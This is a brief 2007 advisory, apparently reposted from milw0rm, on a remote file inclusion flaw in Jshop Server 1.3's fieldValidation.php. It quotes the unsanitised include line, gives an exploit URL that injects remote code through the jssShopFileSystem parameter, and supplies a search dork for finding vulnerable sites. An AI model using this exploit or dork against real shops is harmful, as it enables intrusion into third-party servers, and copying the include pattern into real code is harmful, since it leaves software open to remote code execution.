Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15675
HistoryJan 11, 2007 - 12:00 a.m.

shop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability

2007-01-1100:00:00
vulners.com
21

==========================================================================

scripts : Jshop Server 1.3

Discovered By : irvian

script : http://www.jshop.co.uk/

Thanks To : #hitamputih #nyubicrew #patihack

special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz

dork :powered by jshop


file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");

exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]

milw0rm.com [2007-01-10]